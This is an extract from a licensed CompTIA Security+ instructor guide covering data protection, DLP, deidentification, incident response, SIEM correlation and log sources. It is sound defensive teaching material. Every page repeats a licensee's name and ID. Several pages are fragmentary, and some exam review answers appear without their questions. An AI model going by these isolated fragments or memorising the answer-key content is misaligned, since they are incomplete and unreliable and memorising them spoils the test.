LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 447
Topic 16B
Explain Privacy and Data
Protection Controls
Data stored within a trusted OS can be subject to authorization mechanisms where Data Protection
the OS mediates access using some type of ACL. The presence of a trusted OS
cannot always be assumed, however. Other data protection mechanisms, notably Teaching
encryption, can be used to mitigate the risk that an authorization mechanism can Tip
be countermanded. When deploying a cryptographic system to protect data assets, Make sure students
consideration must be given to all the ways that information could potentially be can distinguish the
intercepted. This means thinking beyond the simple concept of a data file stored on a data states and the
disk. Data can be described as being in one of three states: different types of
encryption that can be
• Data at rest—this state means that the data is in some sort of persistent used.
storage media. Examples of types of data that may be at rest include financial
information stored in databases, archived audiovisual media, operational policies
and other management documents, system configuration data, and more. In this
state, it is usually possible to encrypt the data, using techniques such as whole
disk encryption, database encryption, and file- or folder-level encryption. It is
also possible to apply permissions—access control lists (ACLs)—to ensure only
authorized users can read or modify the data. ACLs can be applied only if access to
the data is fully mediated through a trusted OS.
• Data in transit (or data in motion)—this is the state when data is transmitted over
a network. Examples of types of data that may be in transit include website traffic,
remote access traffic, data being synchronized between cloud repositories, and
more. In this state, data can be protected by a transport encryption protocol, such
as TLS or IPSec.
With data at rest, there is a greater encryption challenge than with data in transit as the
encryption keys must be kept secure for longer. Transport encryption can use ephemeral
(session) keys.
• Data in use (or data in processing)—this is the state when data is present in
volatile memory, such as system RAM or CPU registers and cache. Examples of
types of data that may be in use include documents open in a word processing
Lesson 16: Explaining Data Privacy and Protection Concepts | Topic 16B
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
448 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
application, database data that is currently being modified, event logs being
generated while an operating system is running, and more. When a user works with
data, that data usually needs to be decrypted as it goes from in rest to in use. The
data may stay decrypted for an entire work session, which puts it at risk. However,
trusted execution environment (TEE) mechanisms, such as Intel Software Guard
Extensions (software.intel.com/content/www/us/en/develop/topics/software-guard-
extensions/details.html) are able to encrypt data as it exists in memory, so that an
untrusted process cannot decode the information.
• Using a network protocol, such as HTTP, FTP, SSH, email, or Instant Messaging (IM)/
chat. A sophisticated adversary might use a Remote Access Trojan (RAT) to perform
transfer of data over a nonstandard network port or a packet crafter to transfer
data over a standard port in a nonstandard way. The adversary may also use
encryption to disguise the data being exfiltrated.
While some of these mechanisms are simple to mitigate through the use of
security tools, others may be much less easily defeated. You can protect data using
mechanisms and security controls that you have examined previously:
• Ensure that all sensitive data is encrypted at rest. If the data is transferred outside
the network, it will be mostly useless to the attacker without the decryption key.
• Create and maintain offsite backups of data that may be targeted for destruction or
ransom.
• Restrict the types of network channels that attackers can use to transfer data from
the network to the outside. Disconnect systems storing archived data from the
network.
• Train users about document confidentiality and the use of encryption to store and
transmit data securely. This should also be backed up by HR and auditing policies
that ensure staff are trustworthy.
Even if you apply these policies and controls diligently, there are still risks to data from
insider threats and advanced persistent threat (APT) malware. Consequently, a class of
Lesson 16: Explaining Data Privacy and Protection Concepts | Topic 16B
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 449
security control software has been developed to apply access policies directly to data,
rather than just the host or network on which data is located.
To apply data guardianship policies and procedures, smaller organizations might Data Loss Prevention
classify and type data manually. An organization that creates and collects large
amounts of personal data will usually need to use automated tools to assist with Interaction
this task, however. There may also be a requirement to protect valuable intellectual Opportunity
property (IP) data. Data loss prevention (DLP) products automate the discovery and Refer students to
classification of data types and enforce rules so that data is not viewed or transferred a vendor site for
without a proper authorization. Such solutions will usually consist of the following more information
components: about specific DLP
product features
• Policy server—to configure classification, confidentiality, and privacy rules and and implementation
policies, log incidents, and compile reports. guidelines.
• Endpoint agents—to enforce policy on client computers, even when they are not
connected to the network.
DLP agents scan content in structured formats, such as a database with a formal access
control model or unstructured formats, such as email or word processing documents.
A file cracking process is applied to unstructured data to render it in a consistent
scannable format. The transfer of content to removable media, such as USB devices,
or by email, instant messaging, or even social media, can then be blocked if it does
not conform to a predefined policy. Most DLP solutions can extend the protection
mechanisms to cloud storage services, using either a proxy to mediate access or the
cloud service provider's API to perform scanning and policy enforcement.
Creating a DLP policy in Office 365. (Screenshot used with permission from Microsoft.)
Remediation is the action the DLP software takes when it detects a policy violation. The
following remediation mechanisms are typical:
• Alert only—the copying is allowed, but the management system records an incident
and may alert an administrator.
Lesson 16: Explaining Data Privacy and Protection Concepts | Topic 16B
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
450 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Block—the user is prevented from copying the original file but retains access to it.
The user may or may not be alerted to the policy violation, but it will be logged as an
incident by the management engine.
• Quarantine—access to the original file is denied to the user (or possibly any user).
This might be accomplished by encrypting the file in place or by moving it to a
quarantine area in the file system.
• Tombstone—the original file is quarantined and replaced with one describing the
policy violation and how the user can release it again.
• Restrict printing and forwarding of documents, even when sent as file attachments.
Configuring a rights management template. (Screenshot used with permission from Microsoft.)
Rights management is built into other secure document solutions, such as Adobe
Acrobat.
Lesson 16: Explaining Data Privacy and Protection Concepts | Topic 16B
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 451
Data minimization is the principle that data should only be processed and stored if Privacy Enhancing
that is necessary to perform the purpose for which it is collected. In order to prove Technologies
compliance with the principle of data minimization, each process that uses personal
data should be documented. The workflow can supply evidence of why processing and Teaching
storage of a particular field or data point is required. Data minimization affects the data Tip
retention policy. It is necessary to track how long a data point has been stored for since Make sure students
it was collected and whether continued retention supports a legitimate processing can use this
function. Another impact is on test environments, where the minimization principle terminology correctly.
forbids the use of real data records.
Counterintuitively, the principle of minimization also includes the principle of
sufficiency or adequacy. This means that you should collect the data required for the
stated purpose in a single transaction to which the data subject can give clear consent.
Collecting additional data later would not be compliant with this principle.
Large data sets are often shared or sold between organizations and companies,
especially within the healthcare industry. Where these data sets contain PII or
PHI, steps can be taken to remove the personal or identifying information. These
deidentification processes can also be used internally, so that one group within
a company can receive data for analysis without unnecessary risks to privacy.
Deidentification methods may also be used where personal data is collected to
perform a transaction but does not need to be retained thereafter. This reduces
compliance risk when storing data by applying minimization principles. For example,
a company uses a customer's credit card number to take payment for an order. When
storing the order details, it only keeps the final 4 digits of the card as part of the
transaction log, rather than the full card number.
A fully anonymized data set is one where individual subjects can no longer be
identified, even if the data set is combined with other data sources. Identifying
information is permanently removed. Ensuring full anonymization and preserving the
utility of data for analysis is usually very difficult, however. Consequently, pseudo-
anonymization methods are typically used instead. Pseudo-anonymization modifies
or replaces identifying information so that reidentification depends on an alternate
data source, which must be kept separate. With access to the alternated data, pseudo-
anonymization methods are reversible.
It is important to note that given sufficient contextual information, a data subject can
be reidentified, so great care must be taken when applying deidentification methods
for distribution to different sources. A reidentification attack is one that combines a
deidentified data set with other data sources, such as public voter records, to discover
how secure the deidentification method used is.
K-anonymous information is data that can be linked to two or more individuals. This
means that the data does not unambiguously reidentify a specific individual, but there is a
significant risk of reidentification, given the value of K. For example, if k=5, any group that
can be identified within the data set contains at least five individuals. NIST has produced an
overview of deidentification issues, in draft form at the time of writing (csrc.nist.gov/CSRC/
media/Publications/sp/800-188/draft/documents/sp800_188_draft2.pdf).
Lesson 16: Explaining Data Privacy and Protection Concepts | Topic 16B
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
452 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Data Masking
Data masking can mean that all or part of the contents of a field are redacted,
by substituting all character strings with "x" for example. A field might be partially
redacted to preserve metadata for analysis purposes. For example, in a telephone
number, the dialing prefix might be retained, but the subscriber number redacted.
Data masking can also use techniques to preserve the original format of the field. Data
masking is an irreversible deidentification technique.
Tokenization
Tokenization means that all or part of data in a field is replaced with a randomly
generated token. The token is stored with the original value on a token server or token
vault, separate to the production database. An authorized query or app can retrieve
the original value from the vault, if necessary, so tokenization is a reversible technique.
Tokenization is used as a substitute for encryption, because from a regulatory
perspective an encrypted field is the same value as the original data.
Aggregation/Banding
Another deidentification technique is to generalize the data, such as substituting a
specific age with a broader age band.
• As a storage method for data such as passwords where the original plaintext does
not need to be retained.
A salt is an additional value stored with the hashed data field. The purpose of salt is
to frustrate attempts to crack the hashes. It means that the attacker cannot use pre-
computed tables of hashes using dictionaries of plaintexts. These tables have to be
recompiled to include the salt value.
Lesson 16: Explaining Data Privacy and Protection Concepts | Topic 16B
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 453
Review Activity:
Privacy and Data Protection Controls
Answer the following questions:
This is typical of a data loss prevention (DLP) policy replacing a file involved in a policy
violation with a tombstone file.
Lesson 16: Explaining Data Privacy and Protection Concepts | Topic 16B
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
454 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Lesson 16
Summary
Teaching You should be able explain the importance of data governance policies and tools to
Tip mitigate the risk data breaches and privacy breaches and implement security solutions
Check that students for data protection.
are confident about
the content that has
been covered. If there Guidelines for Data Privacy and Protection
is time, revisit any
content examples that Follow these guidelines for creating or improving data governance policies and
they have questions controls:
about. If you have
used all the available
• Ensure that confidential and personal data is classified and managed using an
time for this lesson information life cycle model.
block, note the issues,
and schedule time for • Assign roles to ensure the proper management of data within the life cycle (owners,
a review later in the custodians, stewards, controllers, processors, and privacy officers).
course.
• Develop classifications for confidential and personal information, based on standard
descriptors such as public, private, sensitive, confidential, critical, proprietary, PII,
health information, financial information, and customer data.
• Make impact assessments for breach events and identify notification and reporting
requirements.
• Use a content management system that enables classification tagging of files and
records.
• Deploy a data loss prevention system that enforces sharing and distribution policies
to files and records across different transmission mechanisms (file systems, email,
messaging, and cloud).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 17
Performing Incident Response
Lesson Objectives
In this lesson, you will:
• Summarize incident response procedures.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
456 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 17A
Summarize Incident
Response Procedures
3. Containment—limit the scope and magnitude of the incident. The principal aim
of incident response is to secure data while limiting the immediate impact on
customers and business partners.
4. Eradication—once the incident is contained, remove the cause and restore the
affected system to a secure state by applying secure configuration settings and
installing patches.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 457
Incident response is likely to require coordinated action and authorization from several
different departments or managers, which adds further levels of complexity.
Preparing for incident response means establishing the policies and procedures Cyber Incident
for dealing with security breaches and the personnel and resources to implement Response Team
those policies.
One of the first challenges lies in defining and categorizing types of incidents. An
incident is generally described as an event where security is breached or there is an
attempted breach. NIST describes an incident as "the act of violating an explicit or
implied security policy." In order to identify and manage incidents, you should develop
some method of reporting, categorizing, and prioritizing them (triage), in the same way
that troubleshooting support incidents can be logged and managed.
As well as investment in appropriate detection and analysis software, incident
response requires expert staffing. Large organizations will provide a dedicated team as
a single point-of-contact for the notification of security incidents. This team is variously
described as a cyber incident response team (CIRT), computer security incident
response team (CSIRT), or computer emergency response team (CERT). Incident
response might also involve or be wholly located within a security operations center
(SOC). However it is set up, the team needs a mixture of senior management decision-
makers (up to director level) who can authorize actions following the most serious
incidents, managers, and technicians who can deal with minor incidents on their own
initiative.
Another important consideration is availability. Incident response will typically require
24/7 availability, which will be expensive to provide. It is also worth considering that
members of the CIRT should be rotated periodically to preclude the possibility of
infiltration. For major incidents, expertise and advice from other business divisions will
also need to be called upon:
• Legal—it is important to have access to legal expertise, so that the team can
evaluate incident response from the perspective of compliance with laws and
industry regulations. It may also be necessary to liaise closely with law enforcement
professionals, and this can be daunting without expert legal advice.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
458 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Some organizations may prefer to outsource some of the CIRT functions to third-party
agencies by retaining an incident response provider. External agents are able to deal
more effectively with insider threats.
Communication Plan
Secure communication between the trusted parties of the CIRT is essential for
managing incidents successfully. It is imperative that adversaries not be alerted to
detection and remediation measures about to be taken against them. It may not be
appropriate for all members of the CSIRT to be informed about all incident details.
The team requires an "out-of-band" or "off-band" communication method that cannot
be intercepted. Using corporate email or VoIP runs the risk that the adversary will
be able to intercept communications. One obvious method is cell phones but these
only support voice and text messaging. For file and data exchange, there should
be a messaging system with end-to-end encryption, such as Off-the-Record (OTR),
Signal, or WhatsApp, or an external email system with message encryption (S/MIME
or PGP). These need to use digital signatures and encryption keys from a system
that is completely separate from the identity management processes of the network
being defended.
Stakeholder Management
Trusted parties might include both internal and external stakeholders. It is not helpful
for an incident to be publicized in the press or through social media outside of planned
communications. Ensure that parties with privileged information do not release this
information to untrusted parties, whether intentionally or inadvertently.
You need to consider obligations to report the attack. It may be necessary to inform
affected parties during or immediately after the incident so that they can perform their
own remediation. It may be necessary to report to regulators or law enforcement. You
also need to consider the marketing and PR impact of an incident. This can be highly
Show Slide(s)
damaging and you will need to demonstrate to customers that security systems have
been improved.
Incident Response
Plan
Incident Response Plan
Teaching
Tip An incident response plan (IRP) lists the procedures, contacts, and resources
available to responders for various incident categories. The CSIRT should develop
Contrast specific
IRPs with the general profiles or scenarios of typical incidents (DDoS attack, virus/worm outbreak, data
processes of incident exfiltration by an external adversary, data modification by an internal adversary, and
response. so on). This will guide investigators in determining priorities and remediation plans. A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 459
• Detection time—research has shown that the existence of more than half of data
breaches are not detected for weeks or months after the intrusion occurs, while in
a successful intrusion data is typically breached within minutes. This demonstrates
that the systems used to search for intrusions must be thorough and the response
to detection must be fast.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
460 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
2. Weaponization—the attacker couples payload code that will enable access with
exploit code that will use a vulnerability to execute on the target system.
7. Actions on objectives—in this phase, the attacker typically uses the access he
has achieved to covertly collect information from target systems and transfer
it to a remote system (data exfiltration). An attacker may have other goals or
motives, however.
MITRE ATT&CK
As an alternative to the life cycle analysis implied by a kill chain, the MITRE
Corporation's Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK)
matrices provide access to a database of known TTPs. This freely available resource
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 461
(attack.mitre.org) tags each technique with a unique ID and places it in one or more
tactic categories, such as initial access, persistence, lateral movement, or command
and control. The sequence in which attackers may deploy any given tactic category is
not made explicit. This means analysts must interpret each attack life cycle from local
evidence. The framework makes TTPs used by different adversary groups directly
comparable, without assuming how any particular adversary will run a campaign at a
strategic level.
There is a matrix for enterprise, which can also be viewed as TTPs directed against
Linux, macOS, and Windows hosts, and a second matrix for mobile. For example, Drive
by Compromise is given the ID T1189 and categorized as an Initial Access tactic that
can target Windows, Linux, and macOS hosts. Clicking through to the page accesses
information about detection methods, mitigation methods, and examples of historic
uses and analysis.
Intrusion event represented in the Diamond Model. (Image: Released to public domain by
Sergio Caltagirone, Andrew Pendergast, and Christopher Betz [activeresponse.org/wp-content/
uploads/2013/07/diamond.pdf].)
The procedures and tools used for incident response are difficult to master and Incident Response
execute effectively. You do not want to be in the situation where first-time staff Exercises
members are practicing them in the high-pressure environment of an actual incident.
Running test exercises helps staff develop competencies and can help to identify
deficiencies in the procedures and tools. Training on specific incident response
scenarios can use three forms:
• Tabletop—this is the least costly type of training. The facilitator presents a scenario
and the responders explain what action they would take to identify, contain, and
eradicate the threat. The training does not use computer systems. The scenario data
is presented as flashcards.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
462 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Members of Kentucky and Alabama National and Air Guard participating in a simulated network
attack exercise. (Image © 2017 Kentucky National Guard.)
MITRE have published a white paper that discusses preparing and facilitating incident
response exercises (mitre.org/sites/default/files/publications/pr_14-3929-cyber-exercise-
playbook.pdf).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 463
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
464 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Incident Response Procedures
Answer the following questions:
1. What are the six phases of the incident response life cycle?
False—security alerts should be sent to those able to deal with them at a given level of
security awareness and on a need-to-know basis.
The response team needs a secure channel to communicate over without alerting
the threat actor. There may also be availability issues with the main communication
network, if it has been affected by the incident.
A simulation exercise creates an actual intrusion scenario, with a red team performing
the intrusion and a blue team attempting to identify, contain, and eradicate it.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 465
Topic 17B
Utilize Appropriate Data Sources
for Incident Response
It is wise to provide for confidential reporting so that employees are not afraid to
report insider threats, such as fraud or misconduct. It may also be necessary to use an
"out-of-band" method of communication so as not to alert the intruder that his or her
attack has been detected.
First Responder
When a suspicious event is detected, it is critical that the appropriate person on
the CIRT be notified so that they can take charge of the situation and formulate the
appropriate response. This person is referred to as the first responder. This means
that employees at all levels of the organization must be trained to recognize and
respond appropriately to actual or suspected security incidents. A good level of security
awareness across the whole organization will reduce the incidence of false positives
and negatives. For the most serious incidents, the entire CIRT may be involved in
formulating an effective response.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
466 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Correlation
The SIEM can then run correlation rules on indicators extracted from the data sources
to detect events that should be investigated as potential incidents. You can also filter or
query the data based on the type of incident that has been reported.
Correlation means interpreting the relationship between individual data points to
diagnose incidents of significance to the security team. A SIEM correlation rule is a
statement that matches certain conditions. These rules use logical expressions, such as
AND and OR, and operators, such as == (matches), < (less than), > (greater than), and
in (contains). For example, a single-user logon failure is not a condition that should
raise an alert. Multiple user logon failures for the same account, taking place within
the space of one hour, is more likely to require investigation and is a candidate for
detection by a correlation rule.
Error.LogonFailure > 3 AND LogonFailure.User AND
Duration < 1 hour
As well as correlation between indicators observed on the network, a SIEM is likely to
be configured with a threat intelligence feed. This means that data points observed on
the network can be associated with known threat actor indicators, such as IP addresses
and domain names. AI-assisted analysis enables more sophisticated alerting and
detection of anomalous behavior.
Retention
A SIEM can enact a retention policy so that historical log and network traffic data is kept
for a defined period. This allows for retrospective incident and threat hunting, and can
be a valuable source of forensic evidence.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 467
The SGUIL console in Security Onion. A SIEM can generate huge numbers of alerts
that need to be manually assessed for priority and investigation.
(Screenshot courtesy of Security Onion securityonion.net.)
Sensors
A sensor is a network tap or port mirror that performs packet capture and intrusion
detection. One of the key uses of a SIEM is to aggregate data from multiple sensors and
log sources, but it might also be appropriate to configure dashboards that show output
from a single sensor or source host.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
468 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Statistical deviation analysis can show when a data point should be treated as
suspicious. For example, a cluster graph might show activity by standard users and
privileged users, invoking analysis of behavioral metrics of what processes each type
runs, which systems they access, and so on. A data point that appears outside the
two clusters for standard and administrative users might indicate some suspicious
activity by that account.
RFC 5424 (tools.ietf.org/html/rfc5424) adjusts the structure slightly to split the tag into app
name, process ID, and message ID fields, and to make them part of the header.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 469
• Syslog-ng uses a different configuration file syntax, but can also use TCP/secure
communications and more advanced options for message filtering.
journalctl
In Linux, text-based log files of the sort managed by syslog can be viewed using
commands such as cat, tail, and head. Most modern Linux distributions now
use systemd to initialize the system and to start and manage background services.
Rather than writing events to syslog-format text files, logs from processes managed
by systemd are written to a binary-format file called journald. Events captured by
journald can be forwarded to syslog. To view events in journald directly, you can use
the journalctl command to print the entire journal log, or you can issue various
options with the command to filter the log in a variety of ways, such as matching a
service name or only printing messages matching the specified severity level.
NXlog
NXlog (nxlog.co) is an open-source log normalization tool. One principal use for it is
to collect Windows logs, which use an XML-based format, and normalize them to a
syslog format.
Log file data is a critical resource for investigating security incidents. As well as the Network, OS, and
log format, you must also consider the range of sources for log files and know how to Security Log Files
determine what type of log file will best support any given investigation scenario.
Teaching
System and Security Logs Tip
Emphasize that relying
One source of security information is the event log from each network server or client.
on the default logging
Systems such as Microsoft Windows, Apple macOS, and Linux keep a variety of logs to options is unlikely to
record events as users and software interact with the system. The format of the logs be sufficient. Audit
varies depending on the system. Information contained within the logs also varies by logs in particular
system, and in many cases, the type of information that is captured can be configured. require careful tuning
to provide an effective
When events are generated, they are placed into log categories. These categories audit trail and enforce
describe the general nature of the events or what areas of the OS they affect. The five accountability and
main categories of Windows event logs are: non-repudiation.
We do mention it
• Application—events generated by applications and services, such as when a service elsewhere, but you
cannot start. may want to remind
students that sysmon
• Security—audit events, such as a failed logon or access to a file being denied. is very widely used
for Windows security
• System—events generated by the operating system and its services, such as storage logging (github.com/
volume health checks. SwiftOnSecurity/
sysmon-config).
• Setup—events generated during the installation of Windows.
• Forwarded Events—events that are sent to the local log from other hosts.
Network Logs
Network logs are generated by appliances such as routers, firewalls, switches, and
access points. Log files will record the operation and status of the appliance itself—the
system log for the appliance—plus traffic and access logs recording network behavior,
such as a host trying to use a port that is blocked by the firewall, or an endpoint trying
to use multiple MAC addresses when connected to a switch.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
470 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Authentication Logs
Authentication attempts for each host are likely to be written to the security log. You
might also need to inspect logs from the servers authorizing logons, such as RADIUS
and TACACS+ servers or Windows Active Directory (AD) servers.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 471
VoIP and Call Managers and Session Initiation Protocol (SIP) Traffic
Many VoIP systems use the Session Initiation Protocol (SIP) to identify endpoints and
setup calls. The call content is transferred using a separate protocol, typically the Real
Time Protocol (RTP). VoIP protocols are vulnerable to most of the same vulnerabilities
and exploits as web communications. Both SIP and RTP should use the secure
protocol forms, where endpoints are authenticated and communications protected by
Transport Layer Security (TLS).
The call manager is a gateway that connects endpoints within the local network and
over the Internet. The call manager is also likely to implement a media gateway to
connect VoIP calls to cellphone and landline telephone networks. SIP produces similar
logs to SMTP, typically in the common log format. A SIP log will identify the endpoints
involved in a call request, plus the type of connection (voice only or voice with video,
for instance), and status messaging. When handling requests, the call manager and
any other intermediate servers add their IP address in a Via header, similar to per-
hop SMTP headers. Inspecting the logs might reveal evidence of a man-in-the-middle
attack where an unauthorized proxy is intercepting traffic. VoIP systems connected to
telephone networks are also targets for toll fraud. The call manager's access log can be
audited for suspicious connections.
Dump Files
System memory contains volatile data. A system memory dump creates an image
file that can be analyzed to identify the processes that are running, the contents of
temporary file systems, registry data, network connections, cryptographic keys, and
more. It can also be a means of accessing data that is encrypted when stored on a
mass storage device.
File
File metadata is stored as attributes. The file system tracks when a file was created,
accessed, and modified. A file might be assigned a security attribute, such as marking
it as read-only or as a hidden or system file. The ACL attached to a file showing its
permissions represents another type of attribute. Finally, the file may have extended
attributes recording an author, copyright information, or tags for indexing/searching. In
Linux, the ls command can be used to report file system metadata.
Web
When a client requests a resource from a web server, the server returns the resource
plus headers setting or describing its properties. Also, the client can include headers
in its request. One key use of headers is to transmit authorization information, in
the form of cookies. Headers describing the type of data returned (text or binary, for
instance) can also be of interest. The contents of headers can be inspected using the
standard tools built into web browsers. Header information may also be logged by a
web server.
Email
An email's Internet header contains address information for the recipient and sender,
plus details of the servers handling transmission of the message between them. When
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
472 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
an email is created, the mail user agent (MUA) creates an initial header and forwards
the message to a mail delivery agent (MDA). The MDA should perform checks that the
sender is authorized to issue messages from the domain. Assuming the email isn't
being delivered locally at the same domain, the MDA adds or amends its own header
and then transmits the message to a message transfer agent (MTA). The MTA routes
the message to the recipient, with the message passing via one or more additional
MTAs, such as SMTP servers operated by ISPs or mail security gateways. Each MTA
adds information to the header.
Headers aren't exposed to the user by most email applications, which is why they're
usually not a factor in an average user's judgment. You can view and copy headers
from a mail client via a message properties/options/source command. MTAs can add
a lot of information in each received header, such as the results of spam checking. If
you use a plaintext editor to view the header, it can be difficult to identify where each
part begins and ends. Fortunately, there are plenty of tools available to parse headers
and display them in a more structured format. One example is the Message Analyzer
tool, available as part of the Microsoft Remote Connectivity Analyzer (testconnectivity.
microsoft.com/tests/o365). This will lay out the hops that the message took more
clearly and break out the headers added by each MTA.
Mobile
Mobile phone metadata comprises call detail records (CDRs) of incoming, outgoing,
and attempted calls and SMS text time, duration, and the opposite party's number.
Metadata will also record data transfer volumes. The location history of the device
can be tracked by the list of cell towers it has used to connect to the network. If you
are investigating a suspected insider attack, this metadata could prove a suspect's
whereabouts. Furthermore, AI-enabled analysis (or patient investigation) can
correlate the opposite party numbers to businesses and individuals through other
public records.
CDRs are generated and stored by the mobile operator. The retention period for CDRs
is determined by national and state laws, but is typically around 18 months. CDRs are
directly available for corporate-owned devices, where you can request them from the
communications provider as the owner of the device. Metadata for personally owned
devices would only normally be accessible by law enforcement agencies by subpoena
or with the consent of the account holder. An employment contract might require an
employee to give this consent for bring your own device (BYOD) mobiles used within
the workplace.
Metadata such as current location and time is also added to media such as photos and
videos, though this is true for all types of computing device. When these files are uploaded
to social media sites, they can reveal more information than the uploader intended.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 473
will provide the ability to pivot from the event or alert summary to the underlying
packets. Detailed analysis of the packet contents can help to reveal the tools used in an
attack. It is also possible to extract binary files such as potential malware for analysis.
Netflow/IPFIX
A flow collector is a means of recording metadata and statistics about network traffic
rather than recording each frame. Network traffic and flow data may come from a wide
variety of sources (or probes), such as switches, routers, firewalls, web proxies, and so
forth. Flow analysis tools can provide features such as:
• Highlighting of trends and patterns in traffic generated by particular applications,
hosts, and ports.
• Visualization tools that enable you to quickly create a map of network connections
and interpret patterns of traffic and flow data.
sFlow
sFlow, developed by HP and subsequently adopted as a web standard (tools.ietf.org/
html/rfc3176), uses sampling to measure traffic statistics at any layer of the OSI model
for a wider range of protocol types than the IP-based Netflow. sFlow can also capture
the entire packet header for samples.
Bandwidth Monitor
Bandwidth usage can be a key indicator of suspicious behavior, if you have reliable
baselines for comparison. Unexpected bandwidth consumption could be evidence
of a data exfiltration attack, for instance. Bandwidth usage can be reported by flow
collectors. Firewalls and web security gateways are also likely to support bandwidth
monitoring and alerting.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
474 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Appropriate Data Sources for
Incident Response
Answer the following questions:
False—the first responder would be the member of the CIRT to handle the report.
2. You need to correlate intrusion detection data with web server log files.
What component must you deploy to collect IDS alerts in a SIEM?
You need to deploy a sensor to send network packet captures or intrusion detection
alerts to the SIEM.
3. Which software tool is most appropriate for forwarding Windows event logs
to a Syslog-compatible server?
403 Forbidden is an HTTP status code, so most likely a web server. Another possibility
is a web proxy or gateway.
5. What type of data source(s) would you look for evidence of a suspicious
MTA in?
A Message Transfer Agent (MTA) is an SMTP server. You might inspect an SMTP log or
the Internet header metadata of an email message.
Flow records are generated by NetFlow or IP Flow Information Export (IPFIX) probes.
A flow record is data that matches a flow record, which is a particular combination of
keys (IP endpoints and protocol/port types).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 475
Topic 17C
Apply Mitigation Controls
As incidents cover such a wide range of different scenarios, technologies, motivations, Incident Containment
and degrees of seriousness, there is no standard approach to containment or incident
isolation. Some of the many complex issues facing the CIRT are: Teaching
• What damage or theft has occurred already? How much more could be inflicted and Tip
in what sort of time frame (loss control)? Note that containment
strategies can be
• What countermeasures are available? What are their costs and implications? influenced by the need
to preserve forensic
• What actions could alert the attacker to the fact that the attack has been detected? evidence.
What evidence of the attack must be gathered and preserved?
When an incident has been identified, classified, and prioritized, the next phase of
incident response is containment. Containment techniques can be classed as either
isolation-based or segmentation-based.
Isolation-Based Containment
Isolation involves removing an affected component from whatever larger environment
it is a part of. This can be everything from removing a server from the network after it
has been the target of a DoS attack, to placing an application in a sandbox VM outside
of the host environments it usually runs on. Whatever the circumstances may be,
you'll want to make sure that there is no longer an interface between the affected
component and your production network or the Internet.
A simple option is to disconnect the host from the network completely, either by
pulling the network plug (creating an air gap) or disabling its switch port. This is the
least stealthy option and will reduce opportunities to analyze the attack or malware.
If a group of hosts is affected, you could use routing infrastructure to isolate one or
more infected virtual LANs (VLANs) in a black hole that is not reachable from the rest
of the network. Another possibility is to use firewalls or other security filters to prevent
infected hosts from communicating.
